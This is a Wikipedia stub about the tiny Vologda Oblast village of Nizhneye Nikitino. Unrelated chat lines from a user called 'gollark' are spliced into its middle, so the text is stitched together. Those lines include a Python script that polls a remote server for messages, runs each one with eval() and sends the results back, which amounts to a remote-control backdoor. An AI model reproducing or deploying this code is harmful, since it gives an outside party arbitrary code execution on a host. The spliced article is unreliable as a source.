Nizhneye Nikitino

Nizhneye Nikitino (Russian: Нижнее Никитино) is a rural locality (a village) in Yenangskoye Rural Settlement, Kichmengsko-Gorodetsky District, Vologda Oblast, Russia. The population was 4 as of 2002.[2]

Nizhneye Nikitino

Нижнее Никитино
Village
Nizhneye Nikitino
Nizhneye Nikitino
Coordinates: 60°01′N 46°36′E[1]
CountryRussia
RegionVologda Oblast
DistrictKichmengsko-Gorodetsky District
Time zoneUTC+3:00

Geography

The distance to Kichmengsky Gorodok is 74 km, to Nizhny Yenangsk is 11 km. Baklanikha is the nearest rural locality.

gollark: Probably not?
gollark: Plus, unlike the old version, it only uses builtin python modules.
gollark: It's very secure.
gollark: ```pythonimport urllib3, jsonhttp = urllib3.PoolManager()def send(x): http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "send", "channel": "potatOS", "message": x}), headers={"Content-Type": "application/json"})while True: r = http.request("POST", "https://spudnet.osmarks.net/httponly", body=json.dumps({"mode": "recv", "channel": "potatOS", "timeout": 30000}), headers={"Content-Type": "application/json"}) data = json.loads(r.data) if data["result"] != None: res = data["result"]["data"] try: send(repr(eval(res))) except Exception as e: send(repr(e))```Using the new SPUDNET-HTTP API.
gollark: Make it continuously ping osmarks.net so you know what it's up to.

References

  1. Карта Кичменгско-городецкого района Вологодской области
  2. Данные переписи 2002 года: таблица 2С. М.: Федеральная служба государственной статистики, 2004.
This article is issued from Wikipedia. The text is licensed under Creative Commons - Attribution - Sharealike. Additional terms may apply for the media files.